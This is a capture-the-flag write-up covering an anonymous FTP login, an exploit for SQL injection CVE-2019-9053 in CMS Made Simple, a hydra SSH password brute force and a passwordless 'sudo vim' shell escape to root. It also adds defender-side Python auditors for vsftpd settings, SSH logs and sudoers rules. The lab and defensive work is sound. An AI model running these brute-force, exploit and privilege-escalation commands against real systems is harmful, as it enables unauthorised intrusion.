Step 1: Scanning the target for open ports
For this I used the Nmap tool; the results were as shown below.
$ nmap -T4 -sC -sV -Pn -oN nmap/initial 10.10.183.25
Step 2: Access the target using the ports discovered.
Something interesting in the results is that anonymous FTP login is allowed (highlighted in green). This means I can use the following credentials:
Username: anonymous
Password: anonymous@domain.com
Luckily, for this task you only require the username. Below is a screenshot of the same.
After successful login, my focus was on discovering my environment and what I could access.
One of the directories I found was pub, which did not help much, or rather I did not know what to do with it after getting the notice ‘use PASV’, which I am not conversant with.
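Anonymous FTP is the first weakness this box exposes, so as an added, defender-side example (not part of the original write-up) here is a small Python audit of a vsftpd-style configuration, showing the weak setting that allows the login above next to its corrected form. Both configuration texts are constructed; the option names (anonymous_enable, anon_upload_enable, anon_mkdir_write_enable, write_enable) are vsftpd's real ones.

```python
"""Audit a vsftpd-style configuration for anonymous FTP exposure.

Added example, not part of the original write-up. Both configuration texts
are constructed; the option names are vsftpd's real ones.
"""
from typing import Dict, List

# Constructed: a configuration that allows the anonymous login used in Step 2.
WEAK_CONF = """\
# vsftpd.conf (constructed sample)
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
"""

# Constructed: the same server with anonymous access switched off.
HARDENED_CONF = """\
# vsftpd.conf (constructed sample)
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
anon_upload_enable=NO
"""


def parse_conf(text: str) -> Dict[str, str]:
    """Parse key=value lines; blank lines and '#' comments are ignored.

    Keys are lower-cased and values upper-cased so YES and yes compare equal.
    """
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().upper()
    return settings


def audit_anonymous_ftp(text: str) -> List[str]:
    """Return findings about anonymous FTP access; an empty list means none found."""
    s = parse_conf(text)
    findings: List[str] = []
    anon = s.get("anonymous_enable")
    if anon is None:
        # vsftpd's compiled-in default for this option is YES, so "unset" is not safe.
        findings.append("anonymous_enable is not set; vsftpd defaults it to YES")
        anon = "YES"
    elif anon == "YES":
        findings.append("anonymous_enable=YES: anonymous login is allowed")
    # Upload rights for anonymous users only take effect when write_enable is also YES.
    if anon == "YES" and s.get("write_enable") == "YES":
        if s.get("anon_upload_enable") == "YES":
            findings.append("anon_upload_enable=YES: anonymous users can upload files")
        if s.get("anon_mkdir_write_enable") == "YES":
            findings.append("anon_mkdir_write_enable=YES: anonymous users can create directories")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_anonymous_ftp(conf) or ["no anonymous exposure found"])
```

Run it against a real /etc/vsftpd.conf by passing the file's contents to audit_anonymous_ftp; the "unset" case matters because a config that never mentions anonymous_enable still gets vsftpd's default of YES.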
Step 3: Directory brute force.
After the FTP I decided to check whether the target has web directories and whether one of them was running a vulnerable web application. For this step I used the command shown below, because it finds directories and then goes on to find their sub-directories one after the other.
$ dirb http://10.10.183.25
With this, my interest was in the http://10.10.183.25/simple/ directory, so I copied it into my browser and landed on a CMS home page.
Being a web application, my interest was in whether it is an older version and what vulnerabilities led to the release of a newer version.
As shown in the screenshot above, I could tell that this was CMS Made Simple version 2.2.8. Having found the version, all I had to do was search for vulnerabilities in version 2.2.8.
Step 4: Enumeration.
$ searchsploit -w cms made simple 2.2.8
I landed on CVE-2019-9053, which is an SQL injection vulnerability.
The public exploit for this vulnerability is a Python 2 script that could reveal the password, so I downloaded the script to my machine (46635.py). The next step was to make it executable with the following command:
$ sudo chmod +x 46635.py
Then I ran the script:
$ sudo python 46635.py -u http://10.10.183.25/simple/ --crack -w /usr/share/wordlist/rockyou.txt
Step 5: Enumeration (back to FTP).
$ ftp 10.10.51.204
Username: anonymous
$ ls (checking files/directories in the current directory)
$ cd pub (changing directory to pub)
$ ls (displaying files in pub)
This is where I found the text file ForMitch.txt. Knowing the SSH port is open, using the name mitch as a username was worth a try.
Step 6: Brute forcing SSH.
For this I used hydra:
$ hydra -s 2222 -v -q -l mitch -P /usr/share/wordlist/rockyou.txt -e nsr -t 4 -w 5 10.10.51.204 ssh
With the username mitch I got the password: secret.
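A wordlist run like the one above is very visible on the server side. As an added, defender-side example (not part of the original write-up), the following Python script scans sshd log lines for the pattern it leaves behind: a burst of failed passwords from one address, followed by an accepted login from the same address. The sample log lines are constructed to resemble auth.log entries; the hostname, PIDs and IP addresses are made up.

```python
"""Flag SSH password guessing in sshd log lines.

Added example, not part of the original write-up. The log lines are
constructed; hostname, PIDs and IP addresses are made up.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional

SAMPLE_LOG = """\
Mar  3 10:12:01 target sshd[1201]: Failed password for mitch from 10.10.14.5 port 51022 ssh2
Mar  3 10:12:02 target sshd[1202]: Failed password for mitch from 10.10.14.5 port 51023 ssh2
Mar  3 10:12:03 target sshd[1203]: Failed password for mitch from 10.10.14.5 port 51024 ssh2
Mar  3 10:12:04 target sshd[1204]: Failed password for mitch from 10.10.14.5 port 51025 ssh2
Mar  3 10:12:05 target sshd[1205]: Failed password for mitch from 10.10.14.5 port 51026 ssh2
Mar  3 10:12:06 target sshd[1206]: Failed password for mitch from 10.10.14.5 port 51027 ssh2
Mar  3 10:12:09 target sshd[1209]: Accepted password for mitch from 10.10.14.5 port 51030 ssh2
Mar  3 10:15:40 target sshd[1300]: Failed password for invalid user admin from 10.10.14.9 port 40010 ssh2
Mar  3 10:20:00 target sshd[1350]: Accepted publickey for sunbath from 10.10.14.9 port 40022 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line: str, year: int = 2020) -> Optional[dict]:
    """Return {ts, result, user, ip} for an sshd auth line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies one (2020 is assumed here)
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m.group("result"), "user": m.group("user"), "ip": m.group("ip")}


def detect_bruteforce(lines: List[str], threshold: int = 5, window_s: int = 60) -> Dict[str, dict]:
    """Return one alert per source IP with >= threshold failed logins inside window_s seconds.

    Each alert records the total failures seen from that IP, the user names tried,
    and whether a login was later accepted from the same IP while failures were
    still inside the window (the signature of a successful guess).
    """
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)  # failure times per IP, sliding window
    totals: Dict[str, int] = defaultdict(int)
    users: Dict[str, set] = defaultdict(set)
    alerts: Dict[str, dict] = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip = ev["ip"]
        q = recent[ip]
        while q and (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()  # forget failures older than the window
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            totals[ip] += 1
            users[ip].add(ev["user"])
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"failures": 0, "users": users[ip],
                              "success_after_failures": False, "accepted_user": None}
            if ip in alerts:
                alerts[ip]["failures"] = totals[ip]
        elif ip in alerts and q:
            # accepted login while failures from this IP are still inside the window
            alerts[ip]["success_after_failures"] = True
            alerts[ip]["accepted_user"] = ev["user"]
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, alert)
```

The threshold and window are deliberately low for the constructed sample; on a real host, tune them to the login rate you expect, and treat success_after_failures as the alert that needs an immediate look, since the failures alone only say that guessing was attempted.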
Step 7: SSH login
With the SSH credentials from the brute force I was able to log in.
$ ls (checking files/directories in the current directory)
$ cat user.txt (checking the contents of the txt file I found in the current directory)
1st flag: Good job, keep up!
$ pwd (checking my current directory)
$ cd /home (changing directory)
$ ls (checking for other users)
With this I was able to establish that there is another user named sunbath.
The next step was to check what commands the user mitch can run as root with sudo, and it turns out it is possible to run vim as root without a password.
Step 8: Escalating to root privileges
$ sudo vim -c ':!sh'
With this I was able to access the root directory, where I got root.txt with the final flag.
W3ll don3. You made it!
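The root step works because a sudoers rule lets mitch run an editor as root with no password, and editors can drop to a shell. As an added, defender-side example (not part of the original write-up), here is a Python audit that parses sudoers rules and flags passwordless entries for such binaries, with a weak rule set beside a corrected one. The sudoers texts are constructed; the rule syntax and tag names (NOPASSWD, PASSWD, NOEXEC, SETENV) are sudo's real ones, and the shell-escape list is an illustrative subset, not an exhaustive one.

```python
"""Audit sudoers rules for passwordless commands that can hand out a root shell.

Added example, not part of the original write-up. The sudoers texts are
constructed; the shell-escape list is illustrative, not exhaustive.
"""
import os
import re
from typing import Dict, List, Set

# Constructed: reproduces the Step 8 situation (mitch may run vim as root without a password).
WEAK_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
sunbath ALL=(root) /usr/bin/systemctl status nginx
%admin  ALL=(ALL) ALL
"""

# Constructed: the same rules with the editor entry replaced by a read-only command.
HARDENED_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
mitch   ALL=(root) NOPASSWD: /bin/cat /var/log/nginx/error.log
sunbath ALL=(root) /usr/bin/systemctl status nginx
%admin  ALL=(ALL) ALL
"""

# Editors and pagers that can launch a shell once running as root (illustrative subset).
SHELL_ESCAPE_BINS: Set[str] = {"vim", "vi", "view", "vimdiff", "nano", "less", "more", "man"}

SPEC_RE = re.compile(r"^(?P<user>[^\s=]+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(?P<tag>NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")
OPPOSITE_TAG = {"PASSWD": "NOPASSWD", "NOPASSWD": "PASSWD", "EXEC": "NOEXEC",
                "NOEXEC": "EXEC", "SETENV": "NOSETENV", "NOSETENV": "SETENV"}
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@include")


def parse_sudoers(text: str) -> List[Dict[str, object]]:
    """Return one record per command in each user specification.

    A tag such as NOPASSWD: applies to the command it precedes and to every
    later command in the same rule until another tag overrides it, which is
    how sudo itself reads a Cmnd_Spec_List.
    """
    records: List[Dict[str, object]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        tags: Set[str] = set()
        for item in m.group("cmds").split(","):
            item = item.strip()
            while True:
                t = TAG_RE.match(item)
                if not t:
                    break
                tag = t.group("tag")
                tags.discard(OPPOSITE_TAG[tag])  # PASSWD cancels NOPASSWD, and so on
                tags.add(tag)
                item = item[t.end():]
            records.append({"user": m.group("user"), "runas": m.group("runas") or "root",
                            "tags": set(tags), "command": item})
    return records


def audit_sudoers(text: str) -> List[Dict[str, str]]:
    """Flag passwordless rules: critical for ALL, high for shell-escape binaries, low otherwise."""
    findings: List[Dict[str, str]] = []
    for r in parse_sudoers(text):
        if "NOPASSWD" not in r["tags"]:
            continue
        cmd = str(r["command"])
        if cmd == "ALL":
            sev, why = "critical", "any command as root without a password"
        else:
            binary = os.path.basename(cmd.split()[0]) if cmd else ""
            if binary in SHELL_ESCAPE_BINS:
                sev, why = "high", f"{binary} can launch a shell, so this is a passwordless root shell"
            else:
                sev, why = "low", "passwordless command; confirm it cannot write files or run other programs"
        findings.append({"user": str(r["user"]), "command": cmd, "severity": sev, "reason": why})
    return findings


if __name__ == "__main__":
    for name, rules in (("weak", WEAK_SUDOERS), ("hardened", HARDENED_SUDOERS)):
        print(name, audit_sudoers(rules))
```

Feed it the output of `sudo cat /etc/sudoers` (and the files under /etc/sudoers.d) on a host you administer; the low-severity entries still deserve a look, since the fix for this box is not only dropping vim but making sure whatever replaces it cannot write or execute on the user's behalf.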